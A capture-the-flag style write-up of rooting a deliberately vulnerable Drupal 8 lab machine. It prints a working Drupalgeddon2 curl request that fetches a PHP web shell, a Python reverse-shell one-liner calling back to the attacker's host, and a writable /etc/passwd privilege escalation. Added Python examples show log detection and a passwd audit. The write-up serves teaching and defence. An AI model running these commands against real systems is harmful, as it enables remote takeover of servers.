Hello Friends,
This is my first boot2root writeup, on a vuln machine made by my brother Manish Kishan Tanwar.
This machine is built around the latest vulnerability in the Drupal CMS.
Let's get started...
Since port 80 was open, I started by testing the web app. After looking at the source code, it was clear that the website was running a CMS called Drupal. I verified the Drupal version from changelog.txt.
The Drupal version in use was 8.x. Suddenly something clicked and I thought of giving the famous Drupalgeddon2 exploit a try. I tried exploiting it through curl.
I used the following command to download a PHP web shell:
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
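From the defender's side, the request above has a recognisable shape even though the payload itself is in the POST body, which a normal access log never records. As an added example (not from the original post or from the machine's author), here is a small Python detector that runs over combined-format access-log lines and flags that shape, plus the changelog.txt fetch used to fingerprint the version. The log lines are constructed samples, and the "/core/CHANGELOG.txt" path and log format are assumptions about the target setup.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample combined-format access-log lines (not from the original
# post). The first line mirrors the request shape the writeup sends; the exploit
# payload lives in the POST body, which ordinary access logs do not record, so
# the query string is the signal a detector has to work with.
SAMPLE_LOG = """\
192.168.1.78 - - [10/Apr/2018:12:00:01 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1 HTTP/1.1" 200 1234 "-" "curl/7.58.0"
10.0.0.5 - - [10/Apr/2018:12:00:02 +0000] "GET /user/register HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Apr/2018:12:00:03 +0000] "POST /user/register HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.168.1.78 - - [10/Apr/2018:12:00:04 +0000] "GET /core/CHANGELOG.txt HTTP/1.1" 200 90000 "-" "curl/7.58.0"
"""

# Client IP, method, request target and status are all the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a finding label for one request target, or None if it looks benign."""
    url = urlsplit(target)
    qs = parse_qs(url.query)          # percent-decodes values, so %23 becomes '#'
    parents = qs.get("element_parents", [""])[0]
    # Drupal's own AJAX form requests also carry ajax_form=1 and element_parents,
    # but legitimate ones name form elements. A '#'-prefixed key is a render-array
    # property, which is what Drupalgeddon2 reaches for, whatever form it targets.
    if qs.get("ajax_form") == ["1"] and "#" in parents:
        return "drupalgeddon2-attempt"
    # Fetching the shipped changelog is how the writeup (and scanners) read the
    # exact Drupal version: worth a low-severity note rather than an alert.
    if url.path.lower().endswith("changelog.txt"):
        return "version-fingerprint"
    return None


def scan_log(text):
    """Parse log lines and return (client_ip, label, target) for each finding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                  # unparseable line: skip rather than crash
        label = classify_request(m["target"])
        if label:
            findings.append((m["ip"], label, m["target"]))
    return findings


if __name__ == "__main__":
    for ip, label, target in scan_log(SAMPLE_LOG):
        print(f"{label:22} {ip:15} {target}")
```

The check keys on element_parents containing a '#' rather than on the /user/register path alone, so it still fires when the same trick is aimed at a different form, while plain registrations and ordinary Drupal AJAX requests pass through untouched.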
Through the PHP shell, I got a reverse shell on netcat by using a Python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell I got was not interactive, so I needed to spawn a tty using the command python -c 'import pty;pty.spawn("/bin/sh")'
I tried multiple things, including running some kernel exploits. I found that /etc/passwd had full permissions and I was able to edit this file. I saw that there was an account present in /etc/passwd with a password hash in it. I had seen a similar thing during my OSCP lab, so I tried adding my own root password hash into the root user's entry in passwd.
If a password hash is present in the second field of /etc/passwd, it takes precedence over the one in /etc/shadow, and thus I was able to log in as root.
Thanks for reading. Happy Hacking ;)
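The root cause here is a writable /etc/passwd, and the precedence rule above is what turns that into root. As an added example (not part of the original post), here is a Python audit that checks both halves of the problem: the file's mode bits, and any entry whose second field holds something other than the 'x' (or a locked marker) that defers to /etc/shadow. It goes one step beyond the writeup and also reports any extra UID-0 account, since the same write access allows that too. The passwd content below is a constructed sample with a placeholder hash, and the sample account names are invented.

```python
import os
import stat

# Constructed sample /etc/passwd (not from the original post). The root line shows
# the condition the writeup ends with: a hash sitting directly in field 2 instead
# of the usual 'x'. The hash is a placeholder, not a real one; the account names
# other than root/daemon/www-data/backup are invented for the example.
SAMPLE_PASSWD = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
sysadm:x:0:0::/home/sysadm:/bin/bash
ninja:x:1000:1000::/home/ninja:/bin/bash
"""

# Field-2 values that mean "look in /etc/shadow" or "login disabled";
# anything else is treated by pam_unix as the password hash itself.
SHADOW_OR_LOCKED = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Split passwd content into dicts; malformed lines are reported, not dropped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, pw, uid, gid, _gecos, _home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "shell": shell, "malformed": False})
    return entries


def audit_entries(entries):
    """Return (account, reason) pairs for entries that deserve a look."""
    findings = []
    for e in entries:
        if e["malformed"]:
            findings.append((e["name"], "malformed-line"))
            continue
        pw = e["pw"]
        if pw not in SHADOW_OR_LOCKED and not pw.startswith(("!", "*")):
            # Exactly the trick in the writeup: a hash here wins over /etc/shadow,
            # so whoever can write this file chooses that account's password.
            findings.append((e["name"], "hash-in-passwd"))
        if e["uid"] == "0" and e["name"] != "root":
            # Same file, same write access: a second UID-0 account is root too.
            findings.append((e["name"], "extra-uid0"))
    return findings


def is_group_or_world_writable(mode):
    """True if the mode bits let group or others write (the root cause here)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path="/etc/passwd"):
    """Audit a real file: permissions first, then its contents."""
    findings = []
    mode = os.stat(path).st_mode
    if is_group_or_world_writable(mode):
        findings.append((path, "writable-mode-" + stat.filemode(mode)))
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_entries(parse_passwd(fh.read())))
    return findings


if __name__ == "__main__":
    print("sample:", audit_entries(parse_passwd(SAMPLE_PASSWD)))
    if os.path.exists("/etc/passwd"):
        print("this host:", audit_passwd_file())
```

On a healthy host audit_passwd_file() returns an empty list: /etc/passwd is mode 0644, every field 2 is 'x' or a lock marker, and root is the only UID 0. Any other result is worth the same attention the writeup gave it.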